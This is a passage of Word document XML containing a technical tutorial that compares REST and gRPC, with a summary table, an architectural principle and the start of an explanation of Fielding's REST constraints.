        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D32CFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487177D1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Performance → gRPC                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E7693" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Simplicity → REST                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E7C396" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Type safety → gRPC                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4737B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Cacheability → REST                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06307837" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Browser support → REST                                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C809393" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Streaming → gRPC                                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA2DB8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Developer onboarding → REST                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8B1FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Contract enforcement → gRPC                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C09E43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  Ecosystem/tooling → REST                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C842D08" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C06AB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>└─────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C9D999" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="623D2BC8">
          <v:rect id="_x0000_i6542" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD9F7F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Summary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75"/>
        <w:gridCol w:w="3556"/>
        <w:gridCol w:w="4219"/>
      </w:tblGrid>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="4248B4B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CC879A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dimension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7B0F31" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>REST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02822C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gRPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="420CF80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4AA015" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Philosophy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EC3546" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Resource-oriented (nouns)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C48AC8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Action-oriented (verbs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="322E8DB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9397BC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Best for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30B873" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Public APIs, browsers, CRUD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20F39C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Internal services, streaming, performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="40B0E0D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FFDB2F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Payload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885FE7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>JSON (~100% overhead vs binary)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D42C36" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Protobuf (~60% smaller than JSON)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="27E2E83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AF88E7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:lastRenderedPageBreak/>
              <w:t>Speed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23E11B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Good (limited by JSON + HTTP/1.1)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7FA4D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Excellent (binary + HTTP/2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="216104F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F3CE0A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Contract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342EBA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Loose (OpenAPI optional)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F147EB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Strict (.proto mandatory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="23D7C9B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088F03" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Streaming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6335AA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Bolt-on (WebSocket, SSE)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0E90DA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Native (4 patterns)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="4F00D15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627F79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Caching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C10073" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Built-in (HTTP semantics)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3B1E29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Manual (no HTTP caching)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="5CE28B5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6B5376" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Browser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6DCECD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Native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A36EE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Requires proxy (gRPC-Web)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="12C546D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08EA10" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Debugging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085702" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Easy (curl, browser, readable)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FEB07C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Harder (binary, specialized tools)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="22D60D9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3B45A7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Adoption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EBDD34" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Universal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91DCF3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Growing rapidly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08D39C31" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391BCAD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST and gRPC are not competitors — they solve different problems in different contexts. REST excels at the edges of your system (public APIs, browser clients, third-party integrations) where universality, cacheability, and simplicity matter most. gRPC excels inside your system (service-to-service communication) where performance, type safety, and streaming matter most. The best architectures use both: REST at the boundary, gRPC at the core, with an API gateway bridging the two worlds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289CBD7F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REST and gRPC — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201E8954" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="44AE5DF9">
          <v:rect id="_x0000_i6615" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E872D56" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What REST and gRPC Actually Are (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E32392" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST and gRPC are not simply "ways to make API calls." That description mistakes the interface for the architecture. REST and gRPC are </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network communication paradigms that define how distributed system components exchange information — each embodying a fundamentally different set of assumptions about data representation, transport semantics, contract enforcement, and operational characteristics that determine the performance envelope, developer experience, and architectural constraints of every system built on them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED85E06" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>The engineering problem both solve is the same: </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how do independent processes, potentially written in different languages, running on different machines, communicate reliably and efficiently?</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> But they solve it with philosophically opposed approaches that reflect different answers to a set of fundamental design questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9BD8AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How should the interface contract be defined?</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> REST relies on informal convention and documentation — a human reads that POST /orders creates an order and GET /orders/{id} retrieves one. gRPC relies on a machine-readable schema (Protobuf IDL) from which client and server code is generated — the contract is enforced by the compiler, not by convention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED47682" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How should data be represented on the wire?</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> REST almost universally uses JSON — a human-readable, self-describing, schema-less text format. gRPC uses Protocol Buffers — a binary, schema-required format where field names are not transmitted (only numeric tags), enabling compact encoding and fast serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D33742" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What communication patterns are supported?</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> REST is fundamentally request-response — one client request, one server response. gRPC supports four patterns: unary (request-response), server streaming, client streaming, and bidirectional streaming — all as first-class protocol primitives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFBDD9A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How is transport handled?</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> REST typically runs over HTTP/1.1, which has fundamental limitations around multiplexing and head-of-line blocking. gRPC is built on HTTP/2, which provides multiplexed streams, header compression, and binary framing — eliminating entire classes of performance problems that REST/HTTP/1.1 systems must work around.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65715C3F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Understanding REST and gRPC requires going below the API level to the wire format, the transport protocol, the serialization mechanics, and the operational properties — because these lower layers determine which system is appropriate for which problem, and why the choice matters at scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ECCE1A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="7058055A">
          <v:rect id="_x0000_i6616" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FABA6E5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. REST — Representational State Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E64CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What REST Actually Is — The Architectural Constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DDDC80" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST (Roy Fielding, 2000) is an </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>architectural style</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> — a set of constraints that, when applied to a distributed system, produce specific properties. Fielding defined six constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F60CDAE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBF4202" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. Client-Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754309A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Separation of concerns: UI/client separate from data storage/server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D950AD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Enables independent evolution of client and server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8B053" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Client doesn't need to know about server storage internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599131D3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Server doesn't need to know about client rendering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3231450B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="27328539" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. Stateless:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DA775" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Each request contains ALL information needed to process it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E25D8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Server stores NO client session state between requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047EB05B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B404138" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Consequence: authentication credentials in every request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B12B0A0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                (JWT in Authorization header, not session cookie on server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570EB534" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A65E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43334859" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Horizontal scaling: any server can handle any request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B4F7B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                         (no sticky sessions required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD4F0A9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Reliability: server crash loses no client state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0021481C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Visibility: each request is self-contained (observable, loggable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7FCF1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F67D1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Tradeoff: larger request payloads (resend auth, context each time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0EA2F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="428E81D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. Cacheable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70182A96" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Server responses must declare themselves cacheable or non-cacheable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A26A4A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Caching eliminates some client-server interactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678713FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44171778" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   HTTP cache headers define this:</w:t>
      </w:r>
    </w:p>
